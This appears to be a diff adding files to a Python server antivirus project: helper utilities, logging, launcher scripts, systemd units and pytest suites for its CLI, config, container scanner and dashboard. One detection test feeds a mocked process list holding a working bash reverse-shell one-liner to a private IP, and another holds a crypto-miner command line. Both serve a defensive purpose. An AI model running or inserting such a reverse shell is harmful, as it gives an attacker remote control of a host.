def get_system_info() -> Dict[str, Any]:
"""Collect hostname, OS, kernel, uptime, CPU, and memory details."""
mem = psutil.virtual_memory()
boot = psutil.boot_time()
uptime_secs = psutil.time.time() - boot
return {
"hostname": socket.gethostname(),
"os": f"{platform.system()} {platform.release()}",
"os_pretty": platform.platform(),
"kernel": platform.release(),
"architecture": platform.machine(),
"cpu_count": psutil.cpu_count(logical=True),
"cpu_physical": psutil.cpu_count(logical=False),
"cpu_percent": psutil.cpu_percent(interval=0.1),
"memory_total": mem.total,
"memory_total_human": format_size(mem.total),
"memory_available": mem.available,
"memory_available_human": format_size(mem.available),
"memory_percent": mem.percent,
"uptime_seconds": uptime_secs,
"uptime_human": format_duration(uptime_secs),
}
# ---------------------------------------------------------------------------
# Path safety
# ---------------------------------------------------------------------------
def safe_path(path: str | Path) -> Path:
"""Resolve and validate a path.
Expands ``~``, resolves symlinks, and ensures the result does not
escape above the filesystem root via ``..`` traversal.
Raises
------
ValueError
If the path is empty or contains null bytes.
"""
s = str(path).strip()
if not s:
raise ValueError("Path must not be empty")
if "\x00" in s:
raise ValueError("Path must not contain null bytes")
resolved = Path(os.path.expanduser(s)).resolve()
return resolved
# ---------------------------------------------------------------------------
# ID generation
# ---------------------------------------------------------------------------
def generate_id() -> str:
"""Return a new UUID4 hex string (32 characters, no hyphens)."""
return uuid.uuid4().hex
# ---------------------------------------------------------------------------
# File hashing
# ---------------------------------------------------------------------------
def hash_file(path: str | Path, algo: str = "sha256") -> str:
"""Return the hex digest of *path* using the specified algorithm.
Reads the file in chunks of :pydata:`SCAN_CHUNK_SIZE` for efficiency.
Parameters
----------
algo:
Any algorithm accepted by :func:`hashlib.new`.
Raises
------
OSError
If the file cannot be opened or read.
"""
h = hashlib.new(algo)
with open(path, "rb") as fh:
while True:
chunk = fh.read(SCAN_CHUNK_SIZE)
if not chunk:
break
h.update(chunk)
return h.hexdigest()
# ---------------------------------------------------------------------------
# Validation
# ---------------------------------------------------------------------------
# Compiled once at import time.
_IPV4_RE = re.compile(
r"^(?:(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}"
r"(?:25[0-5]|2[0-4]\d|[01]?\d\d?)$"
)
_DOMAIN_RE = re.compile(
r"^(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+"
r"[a-zA-Z]{2,}$"
)
def validate_ip(ip: str) -> bool:
"""Return ``True`` if *ip* is a valid IPv4 address."""
return bool(_IPV4_RE.match(ip.strip()))
def validate_domain(domain: str) -> bool:
"""Return ``True`` if *domain* looks like a valid DNS domain name."""
d = domain.strip().rstrip(".")
if len(d) > 253:
return False
return bool(_DOMAIN_RE.match(d))

View File

@@ -0,0 +1,101 @@
"""Logging setup for AYN Antivirus.
Provides a one-call ``setup_logging()`` function that configures a
rotating file handler and an optional console handler with consistent
formatting across the entire application.
"""
from __future__ import annotations
import logging
import os
import sys
from logging.handlers import RotatingFileHandler
from pathlib import Path
from typing import Optional
from ayn_antivirus.constants import DEFAULT_LOG_PATH
# ---------------------------------------------------------------------------
# Format
# ---------------------------------------------------------------------------
_LOG_FORMAT = "[%(asctime)s] %(levelname)s %(name)s: %(message)s"
_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
# Rotating handler defaults.
_MAX_BYTES = 10 * 1024 * 1024 # 10 MB
_BACKUP_COUNT = 5
def setup_logging(
log_dir: str | Path = DEFAULT_LOG_PATH,
level: int | str = logging.INFO,
console: bool = True,
filename: str = "ayn-antivirus.log",
) -> logging.Logger:
"""Configure the root ``ayn_antivirus`` logger.
Parameters
----------
log_dir:
Directory for the rotating log file. Created automatically.
level:
Logging level (``logging.DEBUG``, ``"INFO"``, etc.).
console:
If ``True``, also emit to stderr.
filename:
Name of the log file inside *log_dir*.
Returns
-------
logging.Logger
The configured ``ayn_antivirus`` logger.
"""
if isinstance(level, str):
level = getattr(logging, level.upper(), logging.INFO)
root = logging.getLogger("ayn_antivirus")
root.setLevel(level)
# Avoid duplicate handlers on repeated calls.
if root.handlers:
return root
formatter = logging.Formatter(_LOG_FORMAT, datefmt=_DATE_FORMAT)
# --- Rotating file handler ---
log_path = Path(log_dir)
try:
log_path.mkdir(parents=True, exist_ok=True)
fh = RotatingFileHandler(
str(log_path / filename),
maxBytes=_MAX_BYTES,
backupCount=_BACKUP_COUNT,
encoding="utf-8",
)
fh.setLevel(level)
fh.setFormatter(formatter)
root.addHandler(fh)
except OSError:
# If we can't write to the log dir, fall back to console only.
pass
# --- Console handler ---
if console:
ch = logging.StreamHandler(sys.stderr)
ch.setLevel(level)
ch.setFormatter(formatter)
root.addHandler(ch)
return root
def get_logger(name: str) -> logging.Logger:
"""Return a child logger under the ``ayn_antivirus`` namespace.
Example::
logger = get_logger("scanners.file")
# → logging.getLogger("ayn_antivirus.scanners.file")
"""
return logging.getLogger(f"ayn_antivirus.{name}")

View File

@@ -0,0 +1,25 @@
#!/bin/bash
# AYN Antivirus Dashboard Launcher (for launchd/systemd)
set -euo pipefail
SCRIPT_DIR="$(cd "$(dirname "$0")/.." && pwd)"
DATA_DIR="${AYN_DATA_DIR:-$HOME/ayn-antivirus-data}"
mkdir -p "$DATA_DIR" "$DATA_DIR/quarantine" "$DATA_DIR/logs"
export PYTHONPATH="$SCRIPT_DIR:${PYTHONPATH:-}"
exec /usr/bin/python3 -c "
import os
data_dir = os.environ.get('AYN_DATA_DIR', os.path.expanduser('~/ayn-antivirus-data'))
os.makedirs(data_dir, exist_ok=True)
from ayn_antivirus.config import Config
from ayn_antivirus.dashboard.server import DashboardServer
c = Config()
c.dashboard_host = '0.0.0.0'
c.dashboard_port = 7777
c.dashboard_db_path = os.path.join(data_dir, 'dashboard.db')
c.db_path = os.path.join(data_dir, 'signatures.db')
c.quarantine_path = os.path.join(data_dir, 'quarantine')
DashboardServer(c).run()
"

View File

@@ -0,0 +1,25 @@
#!/bin/bash
# AYN Antivirus Scanner Daemon Launcher (for launchd/systemd)
set -euo pipefail
SCRIPT_DIR="$(cd "$(dirname "$0")/.." && pwd)"
DATA_DIR="${AYN_DATA_DIR:-$HOME/ayn-antivirus-data}"
mkdir -p "$DATA_DIR" "$DATA_DIR/quarantine" "$DATA_DIR/logs"
export PYTHONPATH="$SCRIPT_DIR:${PYTHONPATH:-}"
exec /usr/bin/python3 -c "
import os
data_dir = os.environ.get('AYN_DATA_DIR', os.path.expanduser('~/ayn-antivirus-data'))
os.makedirs(data_dir, exist_ok=True)
from ayn_antivirus.config import Config
from ayn_antivirus.core.scheduler import Scheduler
c = Config()
c.db_path = os.path.join(data_dir, 'signatures.db')
c.quarantine_path = os.path.join(data_dir, 'quarantine')
s = Scheduler(c)
s.schedule_scan('0 0 * * *', 'full')
s.schedule_update(interval_hours=6)
s.run_daemon()
"

View File

@@ -0,0 +1,20 @@
[Unit]
Description=AYN Antivirus Security Dashboard
After=network-online.target
Wants=network-online.target
Documentation=https://github.com/ayn-antivirus
[Service]
Type=simple
User=root
WorkingDirectory=/opt/ayn-antivirus
ExecStart=/opt/ayn-antivirus/bin/run-dashboard.sh
Restart=always
RestartSec=5
Environment=PYTHONPATH=/opt/ayn-antivirus
Environment=AYN_DATA_DIR=/var/lib/ayn-antivirus
StandardOutput=journal
StandardError=journal
[Install]
WantedBy=multi-user.target

View File

@@ -0,0 +1,20 @@
[Unit]
Description=AYN Antivirus Scanner Daemon
After=network-online.target
Wants=network-online.target
Documentation=https://github.com/ayn-antivirus
[Service]
Type=simple
User=root
WorkingDirectory=/opt/ayn-antivirus
ExecStart=/opt/ayn-antivirus/bin/run-scanner.sh
Restart=always
RestartSec=10
Environment=PYTHONPATH=/opt/ayn-antivirus
Environment=AYN_DATA_DIR=/var/lib/ayn-antivirus
StandardOutput=journal
StandardError=journal
[Install]
WantedBy=multi-user.target

View File

@@ -0,0 +1,45 @@
[build-system]
requires = ["setuptools>=68.0", "wheel"]
build-backend = "setuptools.build_meta"
[project]
name = "ayn-antivirus"
version = "1.0.0"
description = "Comprehensive server antivirus, anti-malware, anti-spyware, and anti-cryptominer tool"
requires-python = ">=3.9"
dependencies = [
"click",
"rich",
"psutil",
"yara-python",
"requests",
"pyyaml",
"schedule",
"watchdog",
"cryptography",
"aiohttp",
"sqlite-utils",
]
[project.scripts]
ayn-antivirus = "ayn_antivirus.cli:main"
[tool.setuptools.packages.find]
include = ["ayn_antivirus*"]
[project.optional-dependencies]
dev = [
"pytest",
"pytest-cov",
"black",
"ruff",
]
[tool.black]
line-length = 100
[tool.ruff]
line-length = 100
[tool.pytest.ini_options]
testpaths = ["tests"]

View File

@@ -0,0 +1,39 @@
#!/bin/bash
# =============================================
# ⚔️ AYN Antivirus — Dashboard Launcher
# =============================================
set -e
cd "$(dirname "$0")"
# Install deps if needed
if ! python3 -c "import aiohttp" 2>/dev/null; then
echo "[*] Installing dependencies..."
pip3 install -e . 2>&1 | tail -3
fi
# Create data dirs
mkdir -p /var/lib/ayn-antivirus /var/log/ayn-antivirus 2>/dev/null || true
# Get server IP
SERVER_IP=$(hostname -I 2>/dev/null | awk '{print $1}' || echo "0.0.0.0")
echo ""
echo " ╔══════════════════════════════════════════╗"
echo " ║ ⚔️ AYN ANTIVIRUS DASHBOARD ║"
echo " ╠══════════════════════════════════════════╣"
echo " ║ 🌐 http://${SERVER_IP}:7777 "
echo " ║ 🔑 API key shown below on first start ║"
echo " ║ Press Ctrl+C to stop ║"
echo " ╚══════════════════════════════════════════╝"
echo ""
exec python3 -c "
from ayn_antivirus.config import Config
from ayn_antivirus.dashboard.server import DashboardServer
config = Config()
config.dashboard_host = '0.0.0.0'
config.dashboard_port = 7777
server = DashboardServer(config)
server.run()
"

View File

View File

@@ -0,0 +1,88 @@
"""Tests for CLI commands using Click CliRunner."""
import pytest
from click.testing import CliRunner
from ayn_antivirus.cli import main
@pytest.fixture
def runner():
return CliRunner()
def test_help(runner):
result = runner.invoke(main, ["--help"])
assert result.exit_code == 0
assert "AYN Antivirus" in result.output or "scan" in result.output
def test_version(runner):
result = runner.invoke(main, ["--version"])
assert result.exit_code == 0
assert "1.0.0" in result.output
def test_scan_help(runner):
result = runner.invoke(main, ["scan", "--help"])
assert result.exit_code == 0
assert "--path" in result.output
def test_scan_containers_help(runner):
result = runner.invoke(main, ["scan-containers", "--help"])
assert result.exit_code == 0
assert "--runtime" in result.output
def test_dashboard_help(runner):
result = runner.invoke(main, ["dashboard", "--help"])
assert result.exit_code == 0
assert "--port" in result.output
def test_status(runner):
result = runner.invoke(main, ["status"])
assert result.exit_code == 0
def test_config_show(runner):
result = runner.invoke(main, ["config", "--show"])
assert result.exit_code == 0
def test_config_set_invalid_key(runner):
result = runner.invoke(main, ["config", "--set", "evil_key", "value"])
assert "Invalid config key" in result.output
def test_quarantine_list(runner):
# May fail with PermissionError on systems without /var/lib/ayn-antivirus
result = runner.invoke(main, ["quarantine", "list"])
# Accept exit code 0 (success) or 1 (permission denied on default path)
assert result.exit_code in (0, 1)
def test_update_help(runner):
result = runner.invoke(main, ["update", "--help"])
assert result.exit_code == 0
def test_fix_help(runner):
result = runner.invoke(main, ["fix", "--help"])
assert result.exit_code == 0
assert "--dry-run" in result.output
def test_report_help(runner):
result = runner.invoke(main, ["report", "--help"])
assert result.exit_code == 0
assert "--format" in result.output
def test_scan_processes_runs(runner):
result = runner.invoke(main, ["scan-processes"])
assert result.exit_code == 0
def test_scan_network_runs(runner):
result = runner.invoke(main, ["scan-network"])
assert result.exit_code == 0

View File

@@ -0,0 +1,88 @@
"""Tests for configuration loading and environment overrides."""
import pytest
from ayn_antivirus.config import Config
from ayn_antivirus.constants import DEFAULT_DASHBOARD_HOST, DEFAULT_DASHBOARD_PORT
def test_default_config():
c = Config()
assert c.dashboard_port == DEFAULT_DASHBOARD_PORT
assert c.dashboard_host == DEFAULT_DASHBOARD_HOST
assert c.auto_quarantine is False
assert c.enable_yara is True
assert c.enable_heuristics is True
assert isinstance(c.scan_paths, list)
assert isinstance(c.exclude_paths, list)
assert isinstance(c.api_keys, dict)
def test_config_env_port_host(monkeypatch):
monkeypatch.setenv("AYN_DASHBOARD_PORT", "9999")
monkeypatch.setenv("AYN_DASHBOARD_HOST", "127.0.0.1")
c = Config()
c._apply_env_overrides()
assert c.dashboard_port == 9999
assert c.dashboard_host == "127.0.0.1"
def test_config_env_auto_quarantine(monkeypatch):
monkeypatch.setenv("AYN_AUTO_QUARANTINE", "true")
c = Config()
c._apply_env_overrides()
assert c.auto_quarantine is True
def test_config_scan_path_env(monkeypatch):
monkeypatch.setenv("AYN_SCAN_PATH", "/tmp,/var")
c = Config()
c._apply_env_overrides()
assert "/tmp" in c.scan_paths
assert "/var" in c.scan_paths
def test_config_max_file_size_env(monkeypatch):
monkeypatch.setenv("AYN_MAX_FILE_SIZE", "12345")
c = Config()
c._apply_env_overrides()
assert c.max_file_size == 12345
def test_config_load_missing_file():
"""Loading from non-existent file returns defaults."""
c = Config.load("/nonexistent/path/config.yaml")
assert c.dashboard_port == DEFAULT_DASHBOARD_PORT
assert isinstance(c.scan_paths, list)
def test_config_load_yaml(tmp_path):
"""Loading a valid YAML config file picks up values."""
cfg_file = tmp_path / "config.yaml"
cfg_file.write_text(
"scan_paths:\n - /opt\nauto_quarantine: true\ndashboard_port: 8888\n"
)
c = Config.load(str(cfg_file))
assert c.scan_paths == ["/opt"]
assert c.auto_quarantine is True
assert c.dashboard_port == 8888
def test_config_env_overrides_yaml(tmp_path, monkeypatch):
"""Environment variables take precedence over YAML."""
cfg_file = tmp_path / "config.yaml"
cfg_file.write_text("dashboard_port: 1111\n")
monkeypatch.setenv("AYN_DASHBOARD_PORT", "2222")
c = Config.load(str(cfg_file))
assert c.dashboard_port == 2222
def test_all_fields_accessible():
"""Every expected config attribute exists."""
c = Config()
for attr in [
"scan_paths", "exclude_paths", "quarantine_path", "db_path",
"log_path", "auto_quarantine", "scan_schedule", "max_file_size",
"enable_yara", "enable_heuristics", "enable_realtime_monitor",
"dashboard_host", "dashboard_port", "dashboard_db_path", "api_keys",
]:
assert hasattr(c, attr), f"Missing config attribute: {attr}"

View File

@@ -0,0 +1,405 @@
"""Tests for the container scanner module."""
from __future__ import annotations
import json
from unittest.mock import patch
import pytest
from ayn_antivirus.scanners.container_scanner import (
ContainerInfo,
ContainerScanResult,
ContainerScanner,
ContainerThreat,
)
# ---------------------------------------------------------------------------
# Data class tests
# ---------------------------------------------------------------------------
class TestContainerInfo:
def test_defaults(self):
ci = ContainerInfo(
container_id="abc", name="web", image="nginx",
status="running", runtime="docker", created="2026-01-01",
)
assert ci.ports == []
assert ci.mounts == []
assert ci.pid == 0
assert ci.ip_address == ""
assert ci.labels == {}
def test_to_dict(self):
ci = ContainerInfo(
container_id="abc", name="web", image="nginx:1.25",
status="running", runtime="docker", created="2026-01-01",
ports=["80:80"], mounts=["/data"], pid=42,
ip_address="10.0.0.2", labels={"env": "prod"},
)
d = ci.to_dict()
assert d["container_id"] == "abc"
assert d["ports"] == ["80:80"]
assert d["labels"] == {"env": "prod"}
class TestContainerThreat:
def test_to_dict(self):
ct = ContainerThreat(
container_id="abc", container_name="web", runtime="docker",
threat_name="Miner.X", threat_type="miner",
severity="CRITICAL", details="found xmrig",
)
d = ct.to_dict()
assert d["threat_name"] == "Miner.X"
assert d["severity"] == "CRITICAL"
assert len(d["timestamp"]) == 19
def test_optional_fields(self):
ct = ContainerThreat(
container_id="x", container_name="y", runtime="podman",
threat_name="T", threat_type="malware", severity="HIGH",
details="d", file_path="/tmp/bad", process_name="evil",
)
d = ct.to_dict()
assert d["file_path"] == "/tmp/bad"
assert d["process_name"] == "evil"
class TestContainerScanResult:
def test_empty_is_clean(self):
r = ContainerScanResult(scan_id="t", start_time="2026-01-01 00:00:00")
assert r.is_clean is True
assert r.duration_seconds == 0.0
def test_with_threats(self):
ct = ContainerThreat(
container_id="a", container_name="b", runtime="docker",
threat_name="T", threat_type="miner", severity="HIGH",
details="d",
)
r = ContainerScanResult(
scan_id="t",
start_time="2026-01-01 00:00:00",
end_time="2026-01-01 00:00:10",
threats=[ct],
)
assert r.is_clean is False
assert r.duration_seconds == 10.0
def test_to_dict(self):
r = ContainerScanResult(
scan_id="t",
start_time="2026-01-01 00:00:00",
end_time="2026-01-01 00:00:03",
containers_found=2,
containers_scanned=1,
errors=["oops"],
)
d = r.to_dict()
assert d["threats_found"] == 0
assert d["duration_seconds"] == 3.0
assert d["errors"] == ["oops"]
# ---------------------------------------------------------------------------
# Scanner tests
# ---------------------------------------------------------------------------
class TestContainerScanner:
def test_properties(self):
s = ContainerScanner()
assert s.name == "container_scanner"
assert "Docker" in s.description
assert isinstance(s.available_runtimes, list)
def test_no_runtimes_graceful(self):
"""With no runtimes installed scan returns an error, not an exception."""
s = ContainerScanner()
s._available_runtimes = []
s._docker_cmd = None
s._podman_cmd = None
s._lxc_cmd = None
r = s.scan("all")
assert isinstance(r, ContainerScanResult)
assert r.containers_found == 0
assert len(r.errors) == 1
assert "No container runtimes" in r.errors[0]
def test_scan_returns_result(self):
s = ContainerScanner()
r = s.scan("all")
assert isinstance(r, ContainerScanResult)
assert r.scan_id
assert r.start_time
assert r.end_time
def test_scan_container_delegates(self):
s = ContainerScanner()
s._available_runtimes = []
r = s.scan_container("some-id")
assert isinstance(r, ContainerScanResult)
def test_run_cmd_timeout(self):
_, stderr, rc = ContainerScanner._run_cmd(["sleep", "10"], timeout=1)
assert rc == -1
assert "timed out" in stderr.lower()
def test_run_cmd_not_found(self):
_, stderr, rc = ContainerScanner._run_cmd(
["this_command_does_not_exist_xyz"],
)
assert rc == -1
assert "not found" in stderr.lower() or "No such file" in stderr
def test_find_command(self):
# python3 should exist everywhere
assert ContainerScanner._find_command("python3") is not None
assert ContainerScanner._find_command("no_such_binary_xyz") is None
# ---------------------------------------------------------------------------
# Mock-based integration tests
# ---------------------------------------------------------------------------
class TestDockerParsing:
"""Test Docker output parsing with mocked subprocess calls."""
def _make_scanner(self):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
s._available_runtimes = ["docker"]
return s
def test_list_docker_parses_output(self):
ps_output = (
"abc123456789\tweb\tnginx:1.25\tUp 2 hours\t"
"2026-01-01 00:00:00\t0.0.0.0:80->80/tcp"
)
inspect_output = json.dumps([{
"State": {"Pid": 42},
"NetworkSettings": {"Networks": {"bridge": {"IPAddress": "172.17.0.2"}}},
"Mounts": [{"Source": "/data"}],
"Config": {"Labels": {"app": "web"}},
}])
s = self._make_scanner()
with patch.object(s, "_run_cmd") as mock_run:
mock_run.side_effect = [
(ps_output, "", 0), # docker ps
(inspect_output, "", 0), # docker inspect
]
containers = s._list_docker()
assert len(containers) == 1
c = containers[0]
assert c.name == "web"
assert c.image == "nginx:1.25"
assert c.status == "running"
assert c.runtime == "docker"
assert c.pid == 42
assert c.ip_address == "172.17.0.2"
assert "/data" in c.mounts
assert c.labels == {"app": "web"}
def test_list_docker_ps_failure(self):
s = self._make_scanner()
with patch.object(s, "_run_cmd", return_value=("", "error", 1)):
assert s._list_docker() == []
def test_inspect_docker_bad_json(self):
s = self._make_scanner()
with patch.object(s, "_run_cmd", return_value=("not json", "", 0)):
assert s._inspect_docker("abc") == {}
class TestPodmanParsing:
def test_list_podman_parses_json(self):
s = ContainerScanner()
s._podman_cmd = "/usr/bin/podman"
s._available_runtimes = ["podman"]
podman_output = json.dumps([{
"Id": "def456789012abcdef",
"Names": ["db"],
"Image": "postgres:16",
"State": "running",
"Created": "2026-01-01",
"Ports": [{"hostPort": 5432, "containerPort": 5432}],
"Pid": 99,
"Labels": {},
}])
with patch.object(s, "_run_cmd", return_value=(podman_output, "", 0)):
containers = s._list_podman()
assert len(containers) == 1
assert containers[0].name == "db"
assert containers[0].runtime == "podman"
assert containers[0].pid == 99
class TestLXCParsing:
def test_list_lxc_parses_output(self):
s = ContainerScanner()
s._lxc_cmd = "/usr/bin/lxc-ls"
s._available_runtimes = ["lxc"]
lxc_output = "NAME STATE IPV4 PID\ntest1 RUNNING 10.0.3.5 1234"
with patch.object(s, "_run_cmd", return_value=(lxc_output, "", 0)):
containers = s._list_lxc()
assert len(containers) == 1
assert containers[0].name == "test1"
assert containers[0].status == "running"
assert containers[0].ip_address == "10.0.3.5"
assert containers[0].pid == 1234
class TestMisconfigDetection:
"""Test misconfiguration detection with mocked inspect output."""
def _scan_misconfig(self, inspect_data):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
ci = ContainerInfo(
container_id="abc", name="test", image="img",
status="running", runtime="docker", created="",
)
with patch.object(s, "_run_cmd", return_value=(json.dumps([inspect_data]), "", 0)):
return s._check_misconfigurations(ci)
def test_privileged_mode(self):
threats = self._scan_misconfig({
"HostConfig": {"Privileged": True},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "PrivilegedMode.Container" in names
def test_root_user(self):
threats = self._scan_misconfig({
"HostConfig": {},
"Config": {"User": ""},
})
names = [t.threat_name for t in threats]
assert "RunAsRoot.Container" in names
def test_host_network(self):
threats = self._scan_misconfig({
"HostConfig": {"NetworkMode": "host"},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "HostNetwork.Container" in names
def test_host_pid(self):
threats = self._scan_misconfig({
"HostConfig": {"PidMode": "host"},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "HostPID.Container" in names
def test_dangerous_caps(self):
threats = self._scan_misconfig({
"HostConfig": {"CapAdd": ["SYS_ADMIN", "NET_RAW"]},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "DangerousCap.Container.SYS_ADMIN" in names
assert "DangerousCap.Container.NET_RAW" in names
def test_sensitive_mount(self):
threats = self._scan_misconfig({
"HostConfig": {},
"Config": {"User": "app"},
"Mounts": [{"Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}],
})
names = [t.threat_name for t in threats]
assert "SensitiveMount.Container" in names
def test_no_resource_limits(self):
threats = self._scan_misconfig({
"HostConfig": {"Memory": 0, "CpuQuota": 0},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "NoResourceLimits.Container" in names
def test_security_disabled(self):
threats = self._scan_misconfig({
"HostConfig": {"SecurityOpt": ["seccomp=unconfined"]},
"Config": {"User": "app"},
})
names = [t.threat_name for t in threats]
assert "SecurityDisabled.Container" in names
def test_clean_config(self):
threats = self._scan_misconfig({
"HostConfig": {"Memory": 512000000, "CpuQuota": 50000},
"Config": {"User": "app"},
})
# Should have no misconfig threats
assert len(threats) == 0
class TestImageCheck:
def test_latest_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx:latest",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert any("LatestTag" in t.threat_name for t in threats)
def test_no_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert any("LatestTag" in t.threat_name for t in threats)
def test_pinned_tag(self):
ci = ContainerInfo(
container_id="a", name="b", image="nginx:1.25.3",
status="running", runtime="docker", created="",
)
threats = ContainerScanner._check_image(ci)
assert len(threats) == 0
class TestProcessDetection:
def _make_scanner_and_container(self):
s = ContainerScanner()
s._docker_cmd = "/usr/bin/docker"
ci = ContainerInfo(
container_id="abc", name="test", image="img",
status="running", runtime="docker", created="",
)
return s, ci
def test_miner_detected(self):
s, ci = self._make_scanner_and_container()
ps_output = (
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
"root 1 95.0 8.0 123456 65432 ? Sl 00:00 1:23 /usr/bin/xmrig --pool pool.example.com"
)
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
threats = s._check_processes(ci)
names = [t.threat_name for t in threats]
assert any("CryptoMiner" in n for n in names)
def test_reverse_shell_detected(self):
s, ci = self._make_scanner_and_container()
ps_output = (
"USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n"
"root 1 0.1 0.0 1234 432 ? S 00:00 0:00 bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
)
with patch.object(s, "_run_cmd", return_value=(ps_output, "", 0)):
threats = s._check_processes(ci)
names = [t.threat_name for t in threats]
assert any("ReverseShell" in n for n in names)
def test_stopped_container_skipped(self):
s, ci = self._make_scanner_and_container()
ci.status = "stopped"
# _get_exec_prefix returns None for stopped containers
threats = s._check_processes(ci)
assert threats == []

View File

@@ -0,0 +1,119 @@
"""Tests for dashboard API endpoints."""
import pytest
from aiohttp import web
from ayn_antivirus.dashboard.api import setup_routes, _safe_int
from ayn_antivirus.dashboard.store import DashboardStore
from ayn_antivirus.dashboard.collector import MetricsCollector
@pytest.fixture
def store(tmp_path):
s = DashboardStore(str(tmp_path / "test_api.db"))
yield s
s.close()
@pytest.fixture
def app(store, tmp_path):
application = web.Application()
application["store"] = store
application["collector"] = MetricsCollector(store, interval=9999)
from ayn_antivirus.config import Config
cfg = Config()
cfg.db_path = str(tmp_path / "sigs.db")
application["config"] = cfg
setup_routes(application)
return application
# ------------------------------------------------------------------
# _safe_int unit tests
# ------------------------------------------------------------------
def test_safe_int_valid():
assert _safe_int("50", 10) == 50
assert _safe_int("0", 10, min_val=1) == 1
assert _safe_int("9999", 10, max_val=100) == 100
def test_safe_int_invalid():
assert _safe_int("abc", 10) == 10
assert _safe_int("", 10) == 10
assert _safe_int(None, 10) == 10
# ------------------------------------------------------------------
# API endpoint tests (async, require aiohttp_client)
# ------------------------------------------------------------------
@pytest.mark.asyncio
async def test_health_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/health")
assert resp.status == 200
data = await resp.json()
assert "cpu_percent" in data
@pytest.mark.asyncio
async def test_status_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/status")
assert resp.status == 200
data = await resp.json()
assert "hostname" in data
@pytest.mark.asyncio
async def test_threats_endpoint(app, store, aiohttp_client):
store.record_threat("/tmp/evil", "TestVirus", "malware", "HIGH")
client = await aiohttp_client(app)
resp = await client.get("/api/threats")
assert resp.status == 200
data = await resp.json()
assert data["count"] >= 1
@pytest.mark.asyncio
async def test_scans_endpoint(app, store, aiohttp_client):
store.record_scan("quick", "/tmp", 100, 5, 0, 2.5)
client = await aiohttp_client(app)
resp = await client.get("/api/scans")
assert resp.status == 200
data = await resp.json()
assert data["count"] >= 1
@pytest.mark.asyncio
async def test_logs_endpoint(app, store, aiohttp_client):
store.log_activity("Test log", "INFO", "test")
client = await aiohttp_client(app)
resp = await client.get("/api/logs")
assert resp.status == 200
data = await resp.json()
assert data["count"] >= 1
@pytest.mark.asyncio
async def test_containers_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/containers")
assert resp.status == 200
data = await resp.json()
assert "runtimes" in data
@pytest.mark.asyncio
async def test_definitions_endpoint(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/definitions")
assert resp.status == 200
data = await resp.json()
assert "total_hashes" in data
@pytest.mark.asyncio
async def test_invalid_query_params(app, aiohttp_client):
client = await aiohttp_client(app)
resp = await client.get("/api/threats?limit=abc")
assert resp.status == 200 # Should not crash, uses default

View File

@@ -0,0 +1,148 @@
"""Tests for dashboard store."""
import threading
import pytest
from ayn_antivirus.dashboard.store import DashboardStore
@pytest.fixture
def store(tmp_path):
s = DashboardStore(str(tmp_path / "test_dashboard.db"))
yield s
s.close()
def test_record_and_get_metrics(store):
store.record_metric(
cpu=50.0, mem_pct=60.0, mem_used=4000, mem_total=8000,
disk_usage=[{"mount": "/", "percent": 50}],
load_avg=[1.0, 0.5, 0.3], net_conns=10,
)
latest = store.get_latest_metrics()
assert latest is not None
assert latest["cpu_percent"] == 50.0
assert latest["mem_percent"] == 60.0
assert latest["disk_usage"] == [{"mount": "/", "percent": 50}]
assert latest["load_avg"] == [1.0, 0.5, 0.3]
def test_record_and_get_threats(store):
store.record_threat(
"/tmp/evil", "TestVirus", "malware", "HIGH",
"test_det", "abc", "quarantined", "test detail",
)
threats = store.get_recent_threats(10)
assert len(threats) == 1
assert threats[0]["threat_name"] == "TestVirus"
assert threats[0]["action_taken"] == "quarantined"
def test_threat_stats(store):
store.record_threat("/a", "V1", "malware", "CRITICAL", "d", "", "detected", "")
store.record_threat("/b", "V2", "miner", "HIGH", "d", "", "killed", "")
store.record_threat("/c", "V3", "spyware", "MEDIUM", "d", "", "detected", "")
stats = store.get_threat_stats()
assert stats["total"] == 3
assert stats["by_severity"]["CRITICAL"] == 1
assert stats["by_severity"]["HIGH"] == 1
assert stats["by_severity"]["MEDIUM"] == 1
assert stats["last_24h"] == 3
assert stats["last_7d"] == 3
def test_record_and_get_scans(store):
store.record_scan("full", "/", 1000, 50, 2, 10.5)
scans = store.get_recent_scans(10)
assert len(scans) == 1
assert scans[0]["files_scanned"] == 1000
assert scans[0]["scan_type"] == "full"
assert scans[0]["status"] == "completed"
def test_scan_chart_data(store):
store.record_scan("full", "/", 100, 5, 1, 5.0)
data = store.get_scan_chart_data(30)
assert len(data) >= 1
row = data[0]
assert "day" in row
assert "scans" in row
assert "threats" in row
def test_sig_updates(store):
store.record_sig_update("malwarebazaar", hashes=100, ips=50, domains=20, urls=10)
updates = store.get_recent_sig_updates(10)
assert len(updates) == 1
assert updates[0]["feed_name"] == "malwarebazaar"
stats = store.get_sig_stats()
assert stats["total_hashes"] == 100
assert stats["total_ips"] == 50
assert stats["total_domains"] == 20
assert stats["total_urls"] == 10
def test_activity_log(store):
store.log_activity("Test message", "INFO", "test")
logs = store.get_recent_logs(10)
assert len(logs) == 1
assert logs[0]["message"] == "Test message"
assert logs[0]["level"] == "INFO"
assert logs[0]["source"] == "test"
def test_metrics_history(store):
store.record_metric(
